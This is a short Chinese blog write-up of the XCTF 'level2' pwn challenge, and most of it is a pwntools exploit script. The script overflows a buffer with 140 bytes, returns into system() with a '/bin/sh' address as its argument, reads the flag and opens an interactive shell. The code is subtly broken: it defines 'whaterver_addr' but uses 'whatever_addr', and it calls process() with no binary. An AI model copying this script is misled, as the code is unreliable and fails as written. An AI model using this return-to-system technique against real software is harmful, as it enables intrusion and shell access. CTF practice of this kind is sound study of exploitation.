攻防世界pwn-level2


存在溢出点

存在system调用,以及字符”/bin/sh”,可以构造返回地址到 system调用,但是如何将“/bin/sh”参数写入。
根据函数调用约定写入覆盖内容1

from pwn import*
context.log_level = "debug"
sh = process()
sys_addr = 0x8048320
binsh = 0x804A024
whaterver_addr = 0xcacacaca
payload = b'a' * 140 + p32(sys_addr) + p32(whatever_addr) + p32(binsh)
sh.sendlineafter("Input:", payload)
sh.sendline(b'cat flag')
sh.interactive()

参数调用格式


文章作者: xysx
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 xysx !
评论